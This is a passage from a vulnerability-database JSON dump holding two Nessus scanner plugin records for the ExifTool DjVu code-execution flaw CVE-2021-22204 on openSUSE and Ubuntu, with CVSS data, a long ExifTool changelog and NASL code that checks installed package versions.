AIFF APPL tag as ApplicationData\n\n - Fixed bug writing QuickTime ItemList 'gnre' Genre values\n\n - Fixed an incorrect value for Panasonic VideoBurstResolution\n\n - Fixed problem when applying a time shift to some invalid makernote date/time values\n\nupdate to 12.04 :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Change \n\nupdate to 11.50, see Image-ExifTool-11.50.tar.gz for details\n\nUpdate to version 11.30 :\n\n - Add a new Sony/Minolta LensType.\n\n - Decode streaming metadata from TomTom Bandit Action Cam MP4 videos.\n\n - Decode Reconyx HF2 PRO maker notes.\n\n - Decode ColorData for some new Canon models.\n\n - Enhanced -geotag feature to set AmbientTemperature if available.\n\n - Remove non-significant spaces from some DICOM values.\n\n - Fix possible ''x' outside of string' error when reading corrupted EXIF.\n\n - Fix incorrect write group for GeoTIFF tags.\n\nUpdate to version 11.29\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.27\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.24\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.11 (changes since 11.01) :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to 11.01 :\n\n - Added a new ProfileCMMType\n\n - Added a Validate warning about non-standard EXIF or XMP in PNG images\n\n - Added a new Canon LensType\n\n - Decode a couple more PanasonicRaw tags\n\n - Patched to avoid adding tags to QuickTime videos with multiple 'mdat' atoms --> avoids potential corruption of these videos!\n\nUpdate to 11.00 :\n\n - Added read support for WTV and DVR-MS videos\n\n - Added print conversions for some ASF date/time tags\n\n - Added a new SonyModelID\n\n - Decode a new PanasonicRaw tag\n\n - Decode some new Sony RX100 VI tags\n\n - Made Padding and OffsetSchema tags 'unsafe' so they aren't copied by default", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-05-18T00:00:00", "type": "nessus", "title": "openSUSE Security Update : perl-Image-ExifTool (openSUSE-2021-707)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2022-01-26T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:exiftool", "p-cpe:/a:novell:opensuse:perl-File-RandomAccess", "p-cpe:/a:novell:opensuse:perl-Image-ExifTool", "cpe:/o:novell:opensuse:15.2"], "id": "OPENSUSE-2021-707.NASL", "href": "https://www.tenable.com/plugins/nessus/149550", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2021-707.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(149550);\n script_version(\"1.4\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/01/26\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n\n script_name(english:\"openSUSE Security Update : perl-Image-ExifTool (openSUSE-2021-707)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for perl-Image-ExifTool fixes the following issues :\n\nUpdate to version 12.25 fixes (boo#1185547 CVE-2021-22204)\n\n - JPEG XL support is now official\n\n - Added read support for Medical Research Council (MRC) image files\n\n - Added ability to write a number of 3gp tags in video files\n\n - Added a new Sony PictureProfile value (thanks Jos Roost)\n\n - Added a new Sony LensType (thanks LibRaw)\n\n - Added a new Nikon LensID (thanks Niels Kristian Bech Jensen)\n\n - Added a new Canon LensType\n\n - Decode more GPS information from Blackvue dashcam videos\n\n - Decode a couple of new NikonSettings tags (thanks Warren Hatch)\n\n - Decode a few new RIFF tags\n\n - Improved Validate option to add minor warning if standard XMP is missing xpacket wrapper\n\n - Avoid decoding some large arrays in DNG images to improve performance unless the -m option is used\n\n - Patched bug that could give runtime warning when trying to write an empty XMP structure\n\n - Fixed decoding of ImageWidth/Height for JPEG XL images\n\n - Fixed problem were Microsoft Xtra tags couldn't be deleted\n\nversion 12.24 :\n\n - Added a new PhaseOne RawFormat value (thanks LibRaw)\n\n - Decode a new Sony tag (thanks Jos Roost)\n\n - Decode a few new Panasonic and FujiFilm tags (thanks LibRaw and Greybeard)\n\n - Patched security vulnerability in DjVu reader\n\n - Updated acdsee.config in distribution (thanks StarGeek)\n\n - Recognize AutoCAD DXF files\n\n - More work on experimental JUMBF read support\n\n - More work on experimental JPEG XL read/write support\n\nversion 12.23 :\n\n - Added support for Olympus ORI files\n\n - Added experimental read/write support for JPEG XL images\n\n - Added experimental read support for JUMBF metadata in JPEG and Jpeg2000 images\n\n - Added built-in support for parsing GPS track from Denver ACG-8050 videos with the -ee option\n\n - Added a some new Sony lenses (thanks Jos Roost and LibRaw)\n\n - Changed priority of Samsung trailer tags so the first DepthMapImage takes precedence when -a is not used\n\n - Improved identification of M4A audio files\n\n - Patched to avoid escaping ',' in 'Binary data' message when\n\n -struct is used\n\n - Removed Unknown flag from MXF VideoCodingSchemeID tag\n\n - Fixed -forcewrite=EXIF to apply to EXIF in binary header of EPS files\n\n - API Changes :\n\n + Added BlockExtract option\n\nversion 12.22 :\n\n - Added a few new Sony LensTypes and a new SonyModelID (thanks Jos Roost and LibRaw)\n\n - Added Extra BaseName tag\n\n - Added a new CanonModelID (thanks LibRaw)\n\n - Decode timed GPS from unlisted programs in M2TS videos with the -ee3 option\n\n - Decode more Sony rtmd tags\n\n - Decode some tags for the Sony ILME-FX3 (thanks Jos Roost)\n\n - Allow negative values to be written to XMP-aux:LensID\n\n - Recognize HEVC video program in M2TS files\n\n - Enhanced -b option so --b suppresses tags with binary data\n\n - Improved flexibility when writing GPS coordinates :\n\n + Now pulls latitude and longitude from a combined GPSCoordinates string\n\n + Recognizes the full word 'South' and 'West' to write negative coordinates\n\n - Improved warning when trying to write an integer QuickTime date/time tag and Time::Local is not available\n\n - Convert GPSSpeed from mph to km/h in timed GPS from Garmin MP4 videos\n\nversion 12.21 :\n\n - Added a few new iOS QuickTime tags\n\n - Decode a couple more Sony rtmd tags\n\n - Patch to avoid possible 'Use of uninitialized value' warning when attempting to write QuickTime date/time tags with an invalid value\n\n - Fixed problem writing Microsoft Xtra tags\n\n - Fixed Windows daylight savings time patch for file times that was broken in 12.19 (however directory times will not yet handle DST properly)\n\nversion 12.20 :\n\n - Added ability to write some Microsoft Xtra tags in MOV/MP4 videos\n\n - Added two new Canon LensType values (thanks Norbert Wasser)\n\n - Added a new Nikon LensID\n\n - Fixed problem reading FITS comments that start before column 11\n\nversion 12.19 :\n\n - Added -list_dir option\n\n - Added the 'ls-l' Shortcut tag\n\n - Extract Comment and History from FITS files\n\n - Enhanced FilePermissions to include device type (similar to 'ls -l')\n\n - Changed the name of Apple ContentIdentifier tag to MediaGroupUUID (thanks Neal Krawetz)\n\n - Fixed a potential 'substr outside of string' runtime error when reading corrupted EXIF\n\n - Fixed edge case where NikonScanIFD may not be copied properly when copying MakerNotes to another file\n\n - API Changes :\n\n + Added ability to read/write System tags of directories\n\n + Enhanced GetAllGroups() to support family 7 and take optional ExifTool reference\n\n + Changed QuickTimeHandler option default to 1\n\nversion 12.18 :\n\n - Added a new SonyModelID\n\n - Decode a number of Sony tags for the ILCE-1 (thanks Jos Roost)\n\n - Decode a couple of new Canon tags (thanks LibRaw)\n\n - Patched to read differently formatted UserData:Keywords as written by iPhone\n\n - Patched to tolerate out-of-order Nikon MakerNote IFD entries when obtaining tags necessary for decryption\n\n - Fixed a few possible Condition warnings for some NikonSettings tags\n\nversion 12.17 :\n\n - Added a new Canon FocusMode value\n\n - Added a new FujiFilm FilmMode value\n\n - Added a number of new XMP-crs tags (thanks Herb)\n\n - Decode a new H264 MDPM tag\n\n - Allow non-conforming lower-case XMP boolean 'true' and 'false' values to be written, but only when print conversion is disabled\n\n - Improved Validate option to warn about non-capitalized boolean XMP values\n\n - Improved logic for setting GPSLatitude/LongitudeRef values when writing\n\n - Changed -json and -php options so the -a option is implied even without the -g option\n\n - Avoid extracting audio/video data from AVI videos when\n -ee\n\n -u is used\n\n - Patched decoding of Canon ContinuousShootingSpeed for newer firmware versions of the EOS-1DXmkIII\n\n - Re-worked LensID patch of version 12.00 (github issue #51)\n\n - Fixed a few typos in newly-added NikonSettings tags (thanks Herb)\n\n - Fixed problem where group could not be specified for PNG-pHYs tags when writing version 12.16 :\n\n - Extract another form of video subtitle text\n\n - Enhanced -ee option with -ee2 and -ee3 to allow parsing of the H264 video stream in MP4 files\n\n - Changed a Nikon FlashMode value\n\n - Fixed problem that caused a failed DPX test on Strawberry Perl\n\n - API Changes :\n\n + Enhanced ExtractEmbedded option\n\nversion 12.15 :\n\n - Added a couple of new Sony LensType values (thanks LibRaw and Jos Roost)\n\n - Added a new Nikon FlashMode value (thanks Mike)\n\n - Decode NikonSettings (thanks Warren Hatch)\n\n - Decode thermal information from DJI RJPEG images\n\n - Fixed extra newline in -echo3 and -echo4 outputs added in version 12.10\n\n - Fixed out-of-memory problem when writing some very large PNG files under Windows\n\nversion 12.14 :\n\n - Added support for 2 more types of timed GPS in video files (that makes 49 different formats now supported)\n\n - Added validity check for PDF trailer dictionary Size\n\n - Added a new Pentax LensType\n\n - Extract metadata from Jpeg2000 Association box\n\n - Changed -g:XX:YY and -G:XX:YY options to show empty strings for non-existent groups\n\n - Patched to issue warning and avoid writing date/time values with a zero month or day number\n\n - Patched to avoid runtime warnings if trying to set FileName to an empty string\n\n - Fixed issue that could cause GPS test number 12 to fail on some systems\n\n - Fixed problem extracting XML as a block from Jpeg2000 images, and extract XML tags in the XML group instead of XMP\n\n - Update URL\n\nupdate to 12.13 :\n\n - Add time zone automatically to most string-based QuickTime date/time tags when writing unless the PrintConv option is disabled\n\n - Added -i HIDDEN option to ignore files with names that start with '.'\n\n - Added a few new Nikon ShutterMode values (thanks Jan Skoda)\n\n - Added ability to write Google GCamera MicroVideo XMP tags\n\n - Decode a new Sony tag (thanks LibRaw)\n\n - Changed behaviour when writing only pseudo tags to return an error and avoid writing any other tags if writing FileName fails\n\n - Print 'X image files read' message even if only 1 file is read when at least one other file has failed the -if condition\n\n - Added ability to geotag from DJI CSV log files\n\n - Added a new CanonModelID\n\n - Added a couple of new Sony LensType values (thanks LibRaw)\n\n - Enhanced -csvDelim option to allow '\\t', '\n', '\\r' and '\\\\'\n\n - Unescape '\\b' and '\\f' in imported JSON values\n\n - Fixed bug introduced in 12.10 which generated a 'Not an integer' warning when attempting to shift some QuickTime date/time tags\n\n - Fixed shared-write permission problem with -@ argfile when using -stay_open and a filename containing special characters on Windows\n\n - Added -csvDelim option\n\n - Added new Canon and Olympus LensType values (thanks LibRaw)\n\n - Added a warning if ICC_Profile is deleted from an image (github issue #63)\n\n - EndDir() function for -if option now works when\n -fileOrder is used\n\n - Changed FileSize conversion to use binary prefixes since that is how the conversion is currently done (eg. MiB instead of MB)\n\n - Patched -csv option so columns aren't resorted when using -G option and one of the tags is missing from a file\n\n - Fixed incompatiblity with Google Photos when writing UserData:GPSCoordinates to MP4 videos\n\n - Fixed problem where the tags available in a -p format string were limited to the same as the -if[NUM] option when NUM was specified\n\n - Fixed incorrect decoding of SourceFileIndex/SourceDirectoryIndex for Ricoh models\n\nUpdate to 12.10\n\n - Added -validate test for proper TIFF magic number in JPEG EXIF header\n\n - Added support for Nikon Z7 LensData version 0801\n\n - Added a new XMP-GPano tag\n\n - Decode ColorData for the Canon EOS 1DXmkIII\n\n - Decode more tags for the Sony ILCE-7SM3\n\n - Automatically apply QuickTimeUTC option for CR3 files\n\n - Improved decoding of XAttrMDLabel from MacOS files\n\n - Ignore time zones when writing date/time values and using the -d option\n\n - Enhanced -echo3 and -echo4 options to allow exit status to be returned\n\n - Changed -execute so the -q option no longer suppresses the '(ready)' message when a synchronization number is used\n\n - Added ability to copy CanonMakerNotes from CR3 images to other file types\n\n - Added read support for ON1 presets file (.ONP)\n\n - Added two new CanonModelID values\n\n - Added trailing '/' when writing QuickTime:GPSCoordinates\n\n - Added a number of new XMP-crs tags\n\n - Added a new Sony LensType (thanks Jos Roost)\n\n - Added a new Nikon Z lens (thanks LibRaw)\n\n - Added a new Canon LensType\n\n - Decode ColorData for Canon EOS R5/R6\n\n - Decode a couple of new HEIF tags\n\n - Decode FirmwareVersion for Canon M50\n\n - Improved decoding of Sony CreativeStyle tags\n\n - Improved parsing of Radiance files to recognize comments\n\n - Renamed GIF AspectRatio tag to PixelAspectRatio\n\n - Patched EndDir() feature so subdirectories are always processed when -r is used (previously, EndDir() would end processing of a directory completely)\n\n - Avoid loading GoPro module unnecessarily when reading MP4 videos from some other cameras\n\n - Fixed problem with an incorrect naming of CodecID tags in some MKV videos\n\n - Fixed verbose output to avoid 'adding' messages for existing flattened XMP tags\n\n - Added a new Sony LensType\n\n - Recognize Mac OS X xattr files\n\n - Extract ThumbnailImage from MP4 videos of more dashcam models\n\n - Improved decoding of a number of Sony tags\n\n - Fixed problem where the special -if EndDir() function didn't work properly for directories after the one in which it was initially called\n\n - Patched to read DLL files which don't have a .rsrc section\n\n - Patched to support new IGC date format when geotagging\n\n - Patched to read DLL files with an invalid size in the header \n\n - Added support for GoPro .360 videos\n\n - Added some new Canon RF and Nikkor Z lenses\n\n - Added some new Sony LensType and CreativeStyle values and decode some ILCE-7C tags\n\n - Added a number of new Olympus SceneMode values\n\n - Added a new Nikon LensID\n\n - Decode more timed metadata from Insta360 videos\n\n - Decode timed GPS from videos of more Garmin dashcam models\n\n - Decode a new GoPro video tag\n\n - Reformat time-only EventTime values when writing and prevent arbitrary strings from being written\n\n - Patched to accept backslashes in SourceFile entries for\n -csv option\n\nupdate to 12.06\n\n - Added read support for Lyrics3 metadata (and fixed problem where APE metadata may be ignored if Lyrics3 exists)\n\n - Added a new Panasonic VideoBurstMode value\n\n - Added a new Olympus MultipleExposureMode value\n\n - Added a new Nikon LensID\n\n - Added back conversions for XMP-dwc EventTime that were removed in 12.04 with a patch to allow time-only values\n\n - Decode GIF AspectRatio\n\n - Decode Olympus FocusBracketStepSize\n\n - Extract PNG iDOT chunk in Binary format with the name AppleDataOffsets\n\n - Process PNG images which do not start with mandatory IHDR chunk\n\n - Added a new Panasonic SelfTimer value\n\n - Decode a few more DPX tags\n\n - Extract AIFF APPL tag as ApplicationData\n\n - Fixed bug writing QuickTime ItemList 'gnre' Genre values\n\n - Fixed an incorrect value for Panasonic VideoBurstResolution\n\n - Fixed problem when applying a time shift to some invalid makernote date/time values\n\nupdate to 12.04 :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Change \n\nupdate to 11.50, see Image-ExifTool-11.50.tar.gz for details\n\nUpdate to version 11.30 :\n\n - Add a new Sony/Minolta LensType.\n\n - Decode streaming metadata from TomTom Bandit Action Cam MP4 videos.\n\n - Decode Reconyx HF2 PRO maker notes.\n\n - Decode ColorData for some new Canon models.\n\n - Enhanced -geotag feature to set AmbientTemperature if available.\n\n - Remove non-significant spaces from some DICOM values.\n\n - Fix possible ''x' outside of string' error when reading corrupted EXIF.\n\n - Fix incorrect write group for GeoTIFF tags.\n\nUpdate to version 11.29\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.27\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.24\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to version 11.11 (changes since 11.01) :\n\n - See /usr/share/doc/packages/perl-Image-ExifTool/Changes\n\nUpdate to 11.01 :\n\n - Added a new ProfileCMMType\n\n - Added a Validate warning about non-standard EXIF or XMP in PNG images\n\n - Added a new Canon LensType\n\n - Decode a couple more PanasonicRaw tags\n\n - Patched to avoid adding tags to QuickTime videos with multiple 'mdat' atoms --> avoids potential corruption of these videos!\n\nUpdate to 11.00 :\n\n - Added read support for WTV and DVR-MS videos\n\n - Added print conversions for some ASF date/time tags\n\n - Added a new SonyModelID\n\n - Decode a new PanasonicRaw tag\n\n - Decode some new Sony RX100 VI tags\n\n - Made Padding and OffsetSchema tags 'unsafe' so they aren't copied by default\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1185547\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected perl-Image-ExifTool packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/05/18\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:exiftool\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-File-RandomAccess\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:perl-Image-ExifTool\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2021-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"exiftool-12.25-lp152.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"perl-File-RandomAccess-12.25-lp152.4.3.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"perl-Image-ExifTool-12.25-lp152.4.3.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"exiftool / perl-File-RandomAccess / perl-Image-ExifTool\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-01-23T14:32:29", "description": "The remote Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 host has a package installed that is affected by a vulnerability as referenced in the USN-4987-1 advisory.\n\n - Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows arbitrary code execution when parsing the malicious image (CVE-2021-22204)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "LOW", "baseScore": 7.8, "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-06-10T00:00:00", "type": "nessus", "title": "Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : ExifTool vulnerability (USN-4987-1)", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-22204"], "modified": "2023-01-17T00:00:00", "cpe": ["cpe:/o:canonical:ubuntu_linux:18.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.04:-:lts", "cpe:/o:canonical:ubuntu_linux:20.10", "cpe:/o:canonical:ubuntu_linux:21.04", "p-cpe:/a:canonical:ubuntu_linux:libimage-exiftool-perl"], "id": "UBUNTU_USN-4987-1.NASL", "href": "https://www.tenable.com/plugins/nessus/150692", "sourceData": "#%NASL_MIN_LEVEL 70300\n##\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-4987-1. The text\n# itself is copyright (C) Canonical, Inc. See\n# <https://ubuntu.com/security/notices>. Ubuntu(R) is a registered\n# trademark of Canonical, Inc.\n##\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(150692);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/01/17\");\n\n script_cve_id(\"CVE-2021-22204\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2021/12/01\");\n script_xref(name:\"USN\", value:\"4987-1\");\n\n script_name(english:\"Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 : ExifTool vulnerability (USN-4987-1)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Ubuntu host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Ubuntu 18.04 LTS / 20.04 LTS / 20.10 / 21.04 host has a package installed that is affected by a vulnerability\nas referenced in the USN-4987-1 advisory.\n\n - Improper neutralization of user data in the DjVu file format in ExifTool versions 7.44 and up allows\n arbitrary code execution when parsing the malicious image (CVE-2021-22204)\n\nNote that Nessus has not tested for this issue but has instead relied only on the application's self-reported version\nnumber.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://ubuntu.com/security/notices/USN-4987-1\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected libimage-exiftool-perl package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-22204\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'ExifTool DjVu ANT Perl injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/04/23\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/06/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/06/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:18.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:20.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:21.04\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:libimage-exiftool-perl\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_copyright(english:\"Ubuntu Security Notice (C) 2021-2023 Canonical, Inc. / NASL script (C) 2021-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\ninclude('audit.inc');\ninclude('ubuntu.inc');\ninclude('misc_func.inc');\n\nif ( ! get_kb_item('Host/local_checks_enabled') ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item('Host/Ubuntu/release');\nif ( isnull(release) ) audit(AUDIT_OS_NOT, 'Ubuntu');\nrelease = chomp(release);\nif (! preg(pattern:\"^(18\\.04|20\\.04|20\\.10|21\\.04)$\", string:release)) audit(AUDIT_OS_NOT, 'Ubuntu 18.04 / 20.04 / 20.10 / 21.04', 'Ubuntu ' + release);\nif ( ! get_kb_item('Host/Debian/dpkg-l') ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item('Host/cpu');\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif ('x86_64' >!< cpu && cpu !~ \"^i[3-6]86$\" && 's390' >!< cpu && 'aarch64' >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, 'Ubuntu', cpu);\n\n\npkgs = [\n {'osver': '18.04', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '10.80-1ubuntu0.1'},\n {'osver': '20.04', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '11.88-1ubuntu0.1'},\n {'osver': '20.10', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '12.05-1ubuntu0.1'},\n {'osver': '21.04', 'pkgname': 'libimage-exiftool-perl', 'pkgver': '12.16+dfsg-1ubuntu0.1'}\n];\n\nflag = 0;\nforeach package_array ( pkgs ) {\n osver = NULL;\n pkgname = NULL;\n pkgver = NULL;\n if (!empty_or_null(package_array['osver'])) osver = package_array['osver'];\n if (!empty_or_null(package_array['pkgname'])) pkgname = package_array['pkgname'];\n if (!empty_or_null(package_array['pkgver'])) pkgver = package_array['pkgver'];\n if (osver && pkgname && pkgver) {\n if (ubuntu_check(osver:osver, pkgname:pkgname, pkgver:pkgver)) flag++;\n }\n}\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, 'libimage-exiftool-perl');\n}", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "fedora": [{"lastseen": "2021-07-28T14:46:52", "description": "ExifTool is a Perl module with an included command-line application for reading and writing meta information in image, audio, and video files. It reads EXIF, GPS, IPTC, XMP, JFIF, MakerNotes, GeoTIFF, ICC Profile, Photoshop IRB, FlashPix, AFCP, and ID3 meta information from JPG, JP2, TIFF, GIF, PNG, MNG, JNG, MIFF, EPS, PS, AI, PDF, PSD, BMP, THM, CRW, CR2, MRW, NEF, PEF, ORF, DNG, and many other types of images. ExifTool also extracts information from the maker notes of many digital cameras by various manufacturers including Canon, Casio, FujiFilm, GE, HP, JVC/Victor, Kodak, Leaf, Minolta/Konica-Minolta, Nikon, Olympus/Epson, Panasonic/Leica, Pentax/Asahi, Reconyx, Ricoh, Samsung, Sanyo, Sigma/Foveon, and Sony. ", 